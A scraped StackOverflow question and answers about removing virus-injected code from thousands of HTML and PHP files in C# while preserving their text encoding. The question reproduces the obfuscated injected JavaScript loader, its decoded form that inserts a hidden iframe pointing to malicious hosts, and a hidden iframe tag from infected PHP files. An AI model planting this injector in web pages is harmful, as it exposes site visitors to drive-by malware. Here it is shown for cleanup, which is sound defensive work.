Can a file be read and written right back with small changes without knowing its encoding in C#?

StackOverflow https://stackoverflow.com/questions/9219482

  •  28-04-2021
  •  | 
  •  

Question

I need to download from FTP over 5000 files being .html and .php files. I need to read each file and remove some stuff that was put there by virus and save it back to FTP.

I'm using following code:

string content;
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) {
    content = sr.ReadToEnd();
    sr.Close();
}

using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8))
{
    sw.WriteLine(content);
    sw.Close();
}

I downloaded some files by hand and some have <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" /> but I wouldn't want to assume all of them are like that. I checked with Notepad++ and some text files are ANSI. PHP seems to be UTF-8 and HTML Windows-1250 but I would prefer to be sure to not break the files while trying to fix it. So is there a way that I wouldn't have to know/guess the encoding and it would let me remove virus links from web pages?

Edit. I'm trying to find and remove something like this:

var s=new String();try{document.rvwrew.vewr}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,64/u,59.5*u,210/u,50*u,232/u,52*u,122/u,19.5*u,98/u,24*u,78/u,16*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,122/u,19.5*u,98/u,24*u,78/u,16*u,230/u,58*u,242/u,54*u,202/u,30.5*u,78/u, 59*u,210/u,57.5*u,210/u,49*u,210/u,54*u,210/u,58*u,242/u,29*u,208/u,52.5*u,200/u,50*u,202/u,55*u,118/u,56*u,222/u,57.5*u,210/u,58*u,210/u,55.5*u,220/u,29*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,118/u,54*u,202/u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5*u,78/u,31*u,120/u,23.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,124/u,17*u,82/u,29.5*u,18/u,4.5*u,250/u,4.5*u,18/u,51*u,234/u,55*u,198/u,58*u,210/u,55.5*u,220/u,16*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,61.5*u,18/u,4.5*u,18/u,59*u,194/u,57*u,64/u,51*u,64/u,30.5*u,64/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,198/u,57*u,202/u,48.5*u,232/u,50.5*u,138/u,54*u,202/u,54.5*u,202/u,55*u,232/u,20*u,78/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,230/u,57*u,198/u,19.5*u,88/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51*u,210/u,49*u,202/u,57*u,194/u,57.5*u,232/u,48.5*u,232/u,23*u,198/u,55.5*u,218/u,23.5*u,232/u,50.5*u,218/u,56*u,94/u,57.5*u,232/u,48.5*u,232/u,23*u,224/u,52*u,224/u,19.5*u,82/u,29.5*u,204/u, 23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];if(document.createTextNode)with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{doc.qwe.removeChild()}catch(q){e(s);}

which after decoding is

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://fiberastat.com/temp/stat.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

And when you visit webpage it tells you this (after decoding).

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://vtempe.in/in.cgi?17');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

The script is added at last 3 lines and basically starts right after </html>var

The PHP script has more or less this type of line <iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe> but it can be anywhere in the file.

Not sure if there's any other way then to rewrite those files. But having to go thru 5000 files seems a bit too much and risky :-)

Was it helpful?

Solution

Assuming that none of the files are UTF16 or UTF32, and that the parts that you want to interact with are entirely 7-bit ASCII, you can open and save it as Encoding.Default, which will round-trip any higher character correctly.

OTHER TIPS

The virus didn't need to know the file encoding in order to add its content to your files so it is obviously possible. Rather than treating the file as text, couldn't you just process it as a binary file and search for patterns that match what the virus added?

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
scroll top